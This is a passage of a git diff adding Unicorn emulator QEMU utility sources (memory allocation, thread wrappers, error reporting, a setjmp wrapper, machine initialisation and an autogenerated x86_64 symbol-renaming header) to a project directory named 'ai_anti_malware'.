IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#if defined(__linux__) && (defined(__x86_64__) || defined(__arm__)) + /* Use 2 MiB alignment so transparent hugepages can be used by KVM. + Valgrind does not support alignments larger than 1 MiB, + therefore we need special code which handles running on Valgrind. */ +# define QEMU_VMALLOC_ALIGN (512 * 4096) +#elif defined(__linux__) && defined(__s390x__) + /* Use 1 MiB (segment size) alignment so gmap can be used by KVM. */ +# define QEMU_VMALLOC_ALIGN (256 * 4096) +#else +# define QEMU_VMALLOC_ALIGN getpagesize() +#endif +#define HUGETLBFS_MAGIC 0x958458f6 + +#include "unicorn/platform.h" +#include "config-host.h" +#include "sysemu/sysemu.h" +#include +#include +#include +#ifdef __HAIKU__ +#include +#else +#include +#endif + +#ifdef CONFIG_LINUX +#if !defined(__CYGWIN__) +#include +#endif +#include +#endif + +#ifdef __FreeBSD__ +#include +#endif + +void *qemu_oom_check(void *ptr) +{ + if (ptr == NULL) { + fprintf(stderr, "Failed to allocate memory: %s\n", strerror(errno)); + abort(); + } + return ptr; +} + +void *qemu_try_memalign(size_t alignment, size_t size) +{ + void *ptr; + + if (alignment < sizeof(void*)) { + alignment = sizeof(void*); + } + +#if defined(_POSIX_C_SOURCE) && !defined(__sun__) + int ret; + ret = posix_memalign(&ptr, alignment, size); + if (ret != 0) { + errno = ret; + ptr = NULL; + } +#elif defined(CONFIG_BSD) + ptr = valloc(size); +#else + ptr = memalign(alignment, size); +#endif + return ptr; +} + +void *qemu_memalign(size_t alignment, size_t size) +{ + return qemu_oom_check(qemu_try_memalign(alignment, size)); +} + +/* alloc shared memory pages */ +void *qemu_anon_ram_alloc(size_t size, uint64_t *alignment) +{ + size_t align = QEMU_VMALLOC_ALIGN; + size_t total = 
size + align - getpagesize(); + void *ptr = mmap(0, total, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + size_t offset = QEMU_ALIGN_UP((uintptr_t)ptr, align) - (uintptr_t)ptr; + + if (ptr == MAP_FAILED) { + return NULL; + } + + if (alignment) { + *alignment = align; + } + ptr += offset; + total -= offset; + + if (offset > 0) { + munmap(ptr - offset, offset); + } + if (total > size) { + munmap(ptr + size, total - size); + } + + return ptr; +} + +void qemu_vfree(void *ptr) +{ + free(ptr); +} + +void qemu_anon_ram_free(void *ptr, size_t size) +{ + if (ptr) { + munmap(ptr, size); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-win32.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-win32.c new file mode 100644 index 0000000..cb60b98 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-win32.c @@ -0,0 +1,103 @@ +/* + * os-win32.c + * + * Copyright (c) 2003-2008 Fabrice Bellard + * Copyright (c) 2010 Red Hat, Inc. + * + * QEMU library functions for win32 which are shared between QEMU and + * the QEMU tools. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ +#include +#include + +#include +#include "config-host.h" +#include "sysemu/sysemu.h" + +/* this must come after including "trace.h" */ +/* The pragmas are to fix this issue: https://connect.microsoft.com/VisualStudio/feedback/details/976983 */ +#pragma warning(push) +#pragma warning(disable : 4091) +#include +#pragma warning(pop) + +void *qemu_oom_check(void *ptr) +{ + if (ptr == NULL) { + fprintf(stderr, "Failed to allocate memory: %lu\n", GetLastError()); + abort(); + } + return ptr; +} + +void *qemu_try_memalign(size_t alignment, size_t size) +{ + void *ptr; + + if (!size) { + abort(); + } + ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); + // trace_qemu_memalign(alignment, size, ptr); + return ptr; +} + +void *qemu_memalign(size_t alignment, size_t size) +{ + return qemu_oom_check(qemu_try_memalign(alignment, size)); +} + +void *qemu_anon_ram_alloc(size_t size, uint64_t *align) +{ + void *ptr; + + /* FIXME: this is not exactly optimal solution since VirtualAlloc + has 64Kb granularity, but at least it guarantees us that the + memory is page aligned. 
*/ + ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); + // trace_qemu_anon_ram_alloc(size, ptr); + return ptr; +} + +void qemu_vfree(void *ptr) +{ + // trace_qemu_vfree(ptr); + if (ptr) { + VirtualFree(ptr, 0, MEM_RELEASE); + } +} + +void qemu_anon_ram_free(void *ptr, size_t size) +{ + // trace_qemu_anon_ram_free(ptr, size); + if (ptr) { + VirtualFree(ptr, 0, MEM_RELEASE); + } +} + +size_t getpagesize(void) +{ + SYSTEM_INFO system_info; + + GetSystemInfo(&system_info); + return system_info.dwPageSize; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-error.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-error.c new file mode 100644 index 0000000..88f89b7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-error.c @@ -0,0 +1,80 @@ +/* + * Error reporting + * + * Copyright (C) 2010 Red Hat Inc. + * + * Authors: + * Markus Armbruster , + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ + +#include +#include +#include + +static const char *progname; + +/* + * Set the program name for error_print_loc(). + */ +void error_set_progname(const char *argv0) +{ + const char *p = strrchr(argv0, '/'); + progname = p ? p + 1 : argv0; +} + +const char *error_get_progname(void) +{ + return progname; +} + +/* + * Print current location to current monitor if we have one, else to stderr. + */ +static void error_print_loc(void) +{ +} + +/* + * Print an error message to current monitor if we have one, else to stderr. + * Format arguments like vsprintf(). The result should not contain + * newlines. + * Prepend the current location and append a newline. + * It's wrong to call this in a QMP monitor. Use qerror_report() there. 
+ */ +#ifdef _MSC_VER +void error_vreport(const char *fmt, va_list ap) +{ + error_print_loc(); + vfprintf(stderr, fmt, ap); + fprintf(stderr, "\n"); +} +#else +void error_vreport(const char *fmt, va_list ap) +{ + GTimeVal tv; + gchar *timestr; + + error_print_loc(); + error_vprintf(fmt, ap); + error_printf("\n"); +} +#endif + +/* + * Print an error message to current monitor if we have one, else to stderr. + * Format arguments like sprintf(). The result should not contain + * newlines. + * Prepend the current location and append a newline. + * It's wrong to call this in a QMP monitor. Use qerror_report() there. + */ +void error_report(const char *fmt, ...) +{ + va_list ap; + + va_start(ap, fmt); + error_vreport(fmt, ap); + va_end(ap); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-posix.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-posix.c new file mode 100644 index 0000000..c461144 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-posix.c @@ -0,0 +1,86 @@ +/* + * Wrappers around mutex/cond/thread functions + * + * Copyright Red Hat, Inc. 2009 + * + * Author: + * Marcelo Tosatti + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. 
+ * + */ +#include +#include +#include +#include +#include +#include "unicorn/platform.h" +#include +#include +#ifdef __linux__ +#include +#include +#endif +#include "qemu/thread.h" +#include "qemu/atomic.h" + +static void error_exit(int err, const char *msg) +{ + fprintf(stderr, "qemu: %s: %s\n", msg, strerror(err)); + abort(); +} + +int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, + void *(*start_routine)(void*), + void *arg, int mode) +{ + sigset_t set, oldset; + int err; + pthread_attr_t attr; + + err = pthread_attr_init(&attr); + if (err) { + error_exit(err, __func__); + return -1; + } + if (mode == QEMU_THREAD_DETACHED) { + err = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED); + if (err) { + error_exit(err, __func__); + return -1; + } + } + + /* Leave signal handling to the iothread. */ + sigfillset(&set); + pthread_sigmask(SIG_SETMASK, &set, &oldset); + err = pthread_create(&thread->thread, &attr, start_routine, arg); + if (err) { + error_exit(err, __func__); + return -1; + } + + pthread_sigmask(SIG_SETMASK, &oldset, NULL); + + pthread_attr_destroy(&attr); + + return 0; +} + +void qemu_thread_exit(struct uc_struct *uc, void *retval) +{ + pthread_exit(retval); +} + +void *qemu_thread_join(QemuThread *thread) +{ + int err; + void *ret; + + err = pthread_join(thread->thread, &ret); + if (err) { + error_exit(err, __func__); + } + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-win32.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-win32.c new file mode 100644 index 0000000..3a85e6a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-win32.c @@ -0,0 +1,159 @@ +/* + * Win32 implementation for mutex/cond/thread functions + * + * Copyright Red Hat, Inc. 2010 + * + * Author: + * Paolo Bonzini + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. 
+ * + */ +#include "qemu-common.h" +#include "qemu/thread.h" +#include +#include +#include + +#include "uc_priv.h" + + +static void error_exit(int err, const char *msg) +{ + char *pstr; + + FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER, + NULL, err, 0, (LPTSTR)&pstr, 2, NULL); + fprintf(stderr, "qemu: %s: %s\n", msg, pstr); + LocalFree(pstr); + //abort(); +} + +struct QemuThreadData { + /* Passed to win32_start_routine. */ + void *(*start_routine)(void *); + void *arg; + short mode; + + /* Only used for joinable threads. */ + bool exited; + void *ret; + CRITICAL_SECTION cs; + struct uc_struct *uc; +}; + +static unsigned __stdcall win32_start_routine(void *arg) +{ + QemuThreadData *data = (QemuThreadData *) arg; + void *(*start_routine)(void *) = data->start_routine; + void *thread_arg = data->arg; + + if (data->mode == QEMU_THREAD_DETACHED) { + data->uc->qemu_thread_data = NULL; + g_free(data); + data = NULL; + } + qemu_thread_exit(data->uc, start_routine(thread_arg)); + abort(); +} + +void qemu_thread_exit(struct uc_struct *uc, void *arg) +{ + QemuThreadData *data = uc->qemu_thread_data; + + if (data) { + assert(data->mode != QEMU_THREAD_DETACHED); + data->ret = arg; + EnterCriticalSection(&data->cs); + data->exited = true; + LeaveCriticalSection(&data->cs); + } + _endthreadex(0); +} + +void *qemu_thread_join(QemuThread *thread) +{ + QemuThreadData *data; + void *ret; + HANDLE handle; + + data = thread->data; + if (!data) { + return NULL; + } + /* + * Because multiple copies of the QemuThread can exist via + * qemu_thread_get_self, we need to store a value that cannot + * leak there. The simplest, non racy way is to store the TID, + * discard the handle that _beginthreadex gives back, and + * get another copy of the handle here. 
+ */ + handle = qemu_thread_get_handle(thread); + if (handle) { + WaitForSingleObject(handle, INFINITE); + CloseHandle(handle); + } + ret = data->ret; + assert(data->mode != QEMU_THREAD_DETACHED); + DeleteCriticalSection(&data->cs); + data->uc->qemu_thread_data = NULL; + g_free(data); + data = NULL; + return ret; +} + +int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, + void *(*start_routine)(void *), + void *arg, int mode) +{ + HANDLE hThread; + struct QemuThreadData *data; + + data = g_malloc(sizeof *data); + data->start_routine = start_routine; + data->arg = arg; + data->mode = mode; + data->exited = false; + data->uc = uc; + + uc->qemu_thread_data = data; + + if (data->mode != QEMU_THREAD_DETACHED) { + InitializeCriticalSection(&data->cs); + } + + hThread = (HANDLE) _beginthreadex(NULL, 0, win32_start_routine, + data, 0, &thread->tid); + if (!hThread) { + error_exit(GetLastError(), __func__); + return -1; + } + + CloseHandle(hThread); + thread->data = (mode == QEMU_THREAD_DETACHED) ? 
NULL : data; + + return 0; +} + +HANDLE qemu_thread_get_handle(QemuThread *thread) +{ + QemuThreadData *data; + HANDLE handle; + + data = thread->data; + if (!data) { + return NULL; + } + + assert(data->mode != QEMU_THREAD_DETACHED); + EnterCriticalSection(&data->cs); + if (!data->exited) { + handle = OpenThread(SYNCHRONIZE | THREAD_SUSPEND_RESUME, FALSE, + thread->tid); + } else { + handle = NULL; + } + LeaveCriticalSection(&data->cs); + return handle; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-timer-common.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-timer-common.c new file mode 100644 index 0000000..3ab3326 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-timer-common.c @@ -0,0 +1,43 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +#include "qemu/timer.h" + +/***********************************************************/ +/* real time host monotonic timer */ + +#ifdef _WIN32 +int64_t clock_freq; + +INITIALIZER(init_get_clock) +{ + LARGE_INTEGER freq; + int ret; + ret = QueryPerformanceFrequency(&freq); + if (ret == 0) { + fprintf(stderr, "Could not calibrate ticks\n"); + exit(1); + } + clock_freq = freq.QuadPart; +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/setjmp-wrapper-win32.asm b/ai_anti_malware/unicorn/unicorn-master/qemu/util/setjmp-wrapper-win32.asm new file mode 100644 index 0000000..6e6b6ab --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/setjmp-wrapper-win32.asm @@ -0,0 +1,26 @@ +EXTERN _setjmp: proc +PUBLIC _setjmp_wrapper + +_TEXT SEGMENT + +_setjmp_wrapper PROC + +; Why do we need this wrapper? +; Short answer: Windows default implementation of setjmp/longjmp is incompatible with generated code. +; A longer answer: https://blog.lazym.io/2020/09/21/Unicorn-Devblog-setjmp-longjmp-on-Windows/. + +; From qemu os-win32 comments: +; > On w64, setjmp is implemented by _setjmp which needs a second parameter. +; > If this parameter is NULL, longjump does no stack unwinding. +; > That is what we need for QEMU. Passing the value of register rsp (default) +; > lets longjmp try a stack unwinding which will crash with generated code. +; It's true indeed, but MSVC doesn't has a setjmp signature which receives two arguements. +; Therefore, we add a wrapper to keep the second argument zero. 
+xor rdx, rdx +jmp _setjmp + +_setjmp_wrapper ENDP + +_TEXT ENDS + +END \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/vl.c b/ai_anti_malware/unicorn/unicorn-master/qemu/vl.c new file mode 100644 index 0000000..f6c68b4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/vl.c @@ -0,0 +1,156 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +#include "hw/boards.h" // MachineClass +#include "sysemu/sysemu.h" +#include "sysemu/cpus.h" +#include "vl.h" +#include "uc_priv.h" + +#define DEFAULT_RAM_SIZE 128 + +int smp_cpus = 1; +int smp_cores = 1; +int smp_threads = 1; + +// cpus.c +void cpu_resume(CPUState *cpu) +{ + cpu->stop = false; + cpu->stopped = false; +} + +void cpu_stop_current(struct uc_struct *uc) +{ + if (uc->current_cpu) { + uc->current_cpu->stop = false; + uc->current_cpu->stopped = true; + cpu_exit(uc->current_cpu); + } +} + + +/***********************************************************/ +/* machine registration */ + +MachineClass *find_default_machine(struct uc_struct *uc, int arch) +{ + GSList *el, *machines = object_class_get_list(uc, TYPE_MACHINE, false); + MachineClass *mc = NULL; + + for (el = machines; el; el = el->next) { + MachineClass *temp = el->data; + + if ((temp->is_default) && (temp->arch == arch)) { + mc = temp; + break; + } + } + + g_slist_free(machines); + return mc; +} + +DEFAULT_VISIBILITY +int machine_initialize(struct uc_struct *uc) +{ + MachineClass *machine_class; + MachineState *current_machine; + + module_call_init(uc, MODULE_INIT_QOM); + register_types_object(uc); + machine_register_types(uc); + container_register_types(uc); + cpu_register_types(uc); + qdev_register_types(uc); + + // Initialize arch specific. + uc->init_arch(uc); + + module_call_init(uc, MODULE_INIT_MACHINE); + // this will auto initialize all register objects above. 
+ machine_class = find_default_machine(uc, uc->arch); + if (machine_class == NULL) { + //fprintf(stderr, "No machine specified, and there is no default.\n" + // "Use -machine help to list supported machines!\n"); + return -2; + } + + current_machine = MACHINE(uc, object_new(uc, object_class_get_name( + OBJECT_CLASS(machine_class)))); + uc->machine_state = current_machine; + current_machine->uc = uc; + uc->cpu_exec_init_all(uc); + + machine_class->max_cpus = 1; + configure_accelerator(current_machine); + + current_machine->cpu_model = NULL; + + return machine_class->init(uc, current_machine); +} + +void qemu_system_reset_request(struct uc_struct* uc) +{ + cpu_stop_current(uc); +} + +void qemu_system_shutdown_request(void) +{ + //shutdown_requested = 1; +} + +static void machine_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + MachineClass *mc = MACHINE_CLASS(uc, oc); + QEMUMachine *qm = data; + + mc->family = qm->family; + mc->name = qm->name; + mc->init = qm->init; + mc->reset = qm->reset; + mc->max_cpus = qm->max_cpus; + mc->is_default = qm->is_default; + mc->arch = qm->arch; +} + +void qemu_register_machine(struct uc_struct *uc, QEMUMachine *m, const char *type_machine, + void (*init)(struct uc_struct *uc, ObjectClass *oc, void *data)) +{ + char *name = g_strconcat(m->name, TYPE_MACHINE_SUFFIX, NULL); + TypeInfo ti = {0}; + ti.name = name; + ti.parent = type_machine; + ti.class_init = init; + ti.class_data = (void *)m; + + if (init == NULL) + ti.class_init = machine_class_init; + + type_register(uc, &ti); + g_free(name); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/vl.h b/ai_anti_malware/unicorn/unicorn-master/qemu/vl.h new file mode 100644 index 0000000..fe216e7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/vl.h @@ -0,0 +1,7 @@ +#ifndef VL_H_ +#define VL_H_ + +int machine_initialize(struct uc_struct *uc); + +#endif + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/x86_64.h 
b/ai_anti_malware/unicorn/unicorn-master/qemu/x86_64.h new file mode 100644 index 0000000..9b05bec --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/x86_64.h @@ -0,0 +1,3020 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_X86_64_H +#define UNICORN_AUTOGEN_X86_64_H +#define arm_release arm_release_x86_64 +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_x86_64 +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_x86_64 +#define use_idiv_instructions_rt use_idiv_instructions_rt_x86_64 +#define tcg_target_deposit_valid tcg_target_deposit_valid_x86_64 +#define helper_power_down helper_power_down_x86_64 +#define check_exit_request check_exit_request_x86_64 +#define address_space_unregister address_space_unregister_x86_64 +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_x86_64 +#define phys_mem_clean phys_mem_clean_x86_64 +#define tb_cleanup tb_cleanup_x86_64 +#define memory_map memory_map_x86_64 +#define memory_map_ptr memory_map_ptr_x86_64 +#define memory_unmap memory_unmap_x86_64 +#define memory_free memory_free_x86_64 +#define free_code_gen_buffer free_code_gen_buffer_x86_64 +#define helper_raise_exception helper_raise_exception_x86_64 +#define tcg_enabled tcg_enabled_x86_64 +#define tcg_exec_init tcg_exec_init_x86_64 +#define memory_register_types memory_register_types_x86_64 +#define cpu_exec_init_all cpu_exec_init_all_x86_64 +#define vm_start vm_start_x86_64 +#define resume_all_vcpus resume_all_vcpus_x86_64 +#define a15_l2ctlr_read a15_l2ctlr_read_x86_64 +#define a64_translate_init a64_translate_init_x86_64 +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_x86_64 +#define aa64_cacheop_access aa64_cacheop_access_x86_64 +#define aa64_daif_access aa64_daif_access_x86_64 +#define aa64_daif_write aa64_daif_write_x86_64 +#define aa64_dczid_read aa64_dczid_read_x86_64 +#define aa64_fpcr_read aa64_fpcr_read_x86_64 +#define aa64_fpcr_write aa64_fpcr_write_x86_64 +#define 
aa64_fpsr_read aa64_fpsr_read_x86_64 +#define aa64_fpsr_write aa64_fpsr_write_x86_64 +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_x86_64 +#define aa64_zva_access aa64_zva_access_x86_64 +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_x86_64 +#define aarch64_restore_sp aarch64_restore_sp_x86_64 +#define aarch64_save_sp aarch64_save_sp_x86_64 +#define accel_find accel_find_x86_64 +#define accel_init_machine accel_init_machine_x86_64 +#define accel_type accel_type_x86_64 +#define access_with_adjusted_size access_with_adjusted_size_x86_64 +#define add128 add128_x86_64 +#define add16_sat add16_sat_x86_64 +#define add16_usat add16_usat_x86_64 +#define add192 add192_x86_64 +#define add8_sat add8_sat_x86_64 +#define add8_usat add8_usat_x86_64 +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_x86_64 +#define add_cpreg_to_list add_cpreg_to_list_x86_64 +#define addFloat128Sigs addFloat128Sigs_x86_64 +#define addFloat32Sigs addFloat32Sigs_x86_64 +#define addFloat64Sigs addFloat64Sigs_x86_64 +#define addFloatx80Sigs addFloatx80Sigs_x86_64 +#define add_qemu_ldst_label add_qemu_ldst_label_x86_64 +#define address_space_access_valid address_space_access_valid_x86_64 +#define address_space_destroy address_space_destroy_x86_64 +#define address_space_destroy_dispatch address_space_destroy_dispatch_x86_64 +#define address_space_get_flatview address_space_get_flatview_x86_64 +#define address_space_init address_space_init_x86_64 +#define address_space_init_dispatch address_space_init_dispatch_x86_64 +#define address_space_lookup_region address_space_lookup_region_x86_64 +#define address_space_map address_space_map_x86_64 +#define address_space_read address_space_read_x86_64 +#define address_space_rw address_space_rw_x86_64 +#define address_space_translate address_space_translate_x86_64 +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_x86_64 +#define address_space_translate_internal 
address_space_translate_internal_x86_64 +#define address_space_unmap address_space_unmap_x86_64 +#define address_space_update_topology address_space_update_topology_x86_64 +#define address_space_update_topology_pass address_space_update_topology_pass_x86_64 +#define address_space_write address_space_write_x86_64 +#define addrrange_contains addrrange_contains_x86_64 +#define addrrange_end addrrange_end_x86_64 +#define addrrange_equal addrrange_equal_x86_64 +#define addrrange_intersection addrrange_intersection_x86_64 +#define addrrange_intersects addrrange_intersects_x86_64 +#define addrrange_make addrrange_make_x86_64 +#define adjust_endianness adjust_endianness_x86_64 +#define all_helpers all_helpers_x86_64 +#define alloc_code_gen_buffer alloc_code_gen_buffer_x86_64 +#define alloc_entry alloc_entry_x86_64 +#define always_true always_true_x86_64 +#define arm1026_initfn arm1026_initfn_x86_64 +#define arm1136_initfn arm1136_initfn_x86_64 +#define arm1136_r2_initfn arm1136_r2_initfn_x86_64 +#define arm1176_initfn arm1176_initfn_x86_64 +#define arm11mpcore_initfn arm11mpcore_initfn_x86_64 +#define arm926_initfn arm926_initfn_x86_64 +#define arm946_initfn arm946_initfn_x86_64 +#define arm_ccnt_enabled arm_ccnt_enabled_x86_64 +#define arm_cp_read_zero arm_cp_read_zero_x86_64 +#define arm_cp_reset_ignore arm_cp_reset_ignore_x86_64 +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_x86_64 +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_x86_64 +#define arm_cpu_finalizefn arm_cpu_finalizefn_x86_64 +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_x86_64 +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_x86_64 +#define arm_cpu_initfn arm_cpu_initfn_x86_64 +#define arm_cpu_list arm_cpu_list_x86_64 +#define cpu_loop_exit cpu_loop_exit_x86_64 +#define arm_cpu_post_init arm_cpu_post_init_x86_64 +#define arm_cpu_realizefn arm_cpu_realizefn_x86_64 +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_x86_64 +#define 
arm_cpu_register_types arm_cpu_register_types_x86_64 +#define cpu_resume_from_signal cpu_resume_from_signal_x86_64 +#define arm_cpus arm_cpus_x86_64 +#define arm_cpu_set_pc arm_cpu_set_pc_x86_64 +#define arm_cp_write_ignore arm_cp_write_ignore_x86_64 +#define arm_current_el arm_current_el_x86_64 +#define arm_dc_feature arm_dc_feature_x86_64 +#define arm_debug_excp_handler arm_debug_excp_handler_x86_64 +#define arm_debug_target_el arm_debug_target_el_x86_64 +#define arm_el_is_aa64 arm_el_is_aa64_x86_64 +#define arm_env_get_cpu arm_env_get_cpu_x86_64 +#define arm_excp_target_el arm_excp_target_el_x86_64 +#define arm_excp_unmasked arm_excp_unmasked_x86_64 +#define arm_feature arm_feature_x86_64 +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_x86_64 +#define gen_intermediate_code gen_intermediate_code_x86_64 +#define gen_intermediate_code_pc gen_intermediate_code_pc_x86_64 +#define arm_gen_test_cc arm_gen_test_cc_x86_64 +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_x86_64 +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_x86_64 +#define arm_handle_psci_call arm_handle_psci_call_x86_64 +#define arm_is_psci_call arm_is_psci_call_x86_64 +#define arm_is_secure arm_is_secure_x86_64 +#define arm_is_secure_below_el3 arm_is_secure_below_el3_x86_64 +#define arm_ldl_code arm_ldl_code_x86_64 +#define arm_lduw_code arm_lduw_code_x86_64 +#define arm_log_exception arm_log_exception_x86_64 +#define arm_reg_read arm_reg_read_x86_64 +#define arm_reg_reset arm_reg_reset_x86_64 +#define arm_reg_write arm_reg_write_x86_64 +#define restore_state_to_opc restore_state_to_opc_x86_64 +#define arm_rmode_to_sf arm_rmode_to_sf_x86_64 +#define arm_singlestep_active arm_singlestep_active_x86_64 +#define tlb_fill tlb_fill_x86_64 +#define tlb_flush tlb_flush_x86_64 +#define tlb_flush_page tlb_flush_page_x86_64 +#define tlb_set_page tlb_set_page_x86_64 +#define arm_translate_init arm_translate_init_x86_64 +#define arm_v7m_class_init arm_v7m_class_init_x86_64 +#define 
arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_x86_64 +#define ats_access ats_access_x86_64 +#define ats_write ats_write_x86_64 +#define bad_mode_switch bad_mode_switch_x86_64 +#define bank_number bank_number_x86_64 +#define bitmap_zero_extend bitmap_zero_extend_x86_64 +#define bp_wp_matches bp_wp_matches_x86_64 +#define breakpoint_invalidate breakpoint_invalidate_x86_64 +#define build_page_bitmap build_page_bitmap_x86_64 +#define bus_add_child bus_add_child_x86_64 +#define bus_class_init bus_class_init_x86_64 +#define bus_info bus_info_x86_64 +#define bus_unparent bus_unparent_x86_64 +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_x86_64 +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_x86_64 +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_x86_64 +#define call_recip_estimate call_recip_estimate_x86_64 +#define can_merge can_merge_x86_64 +#define capacity_increase capacity_increase_x86_64 +#define ccsidr_read 